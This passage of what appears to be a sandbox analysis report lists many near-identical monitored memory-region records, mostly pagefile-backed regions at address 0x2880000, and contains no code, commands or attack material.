"pagefile_0x0000000002880000" filename = "" Region: id = 8372 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8373 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8374 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8375 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8376 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8377 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8378 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8379 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8380 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8381 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8382 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8383 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8384 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8385 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8386 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8387 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8388 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8389 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8390 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8391 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8392 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8393 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8394 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8395 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8396 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8397 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8398 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8399 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8400 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8401 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8402 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8403 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8404 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8405 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8406 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8407 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8408 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8409 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8410 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8411 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8412 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8413 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8414 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8415 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8416 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8417 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8418 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8419 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8420 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8421 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8422 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8423 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8424 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8425 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8426 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8427 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8428 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8429 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8430 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8431 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8432 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8433 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8434 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8435 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8436 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8437 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8438 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8439 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8440 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8441 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8442 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8443 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8449 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8450 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8451 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8452 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8454 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8472 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8508 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8558 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8559 start_va = 0x2880000 end_va = 0x288ffff 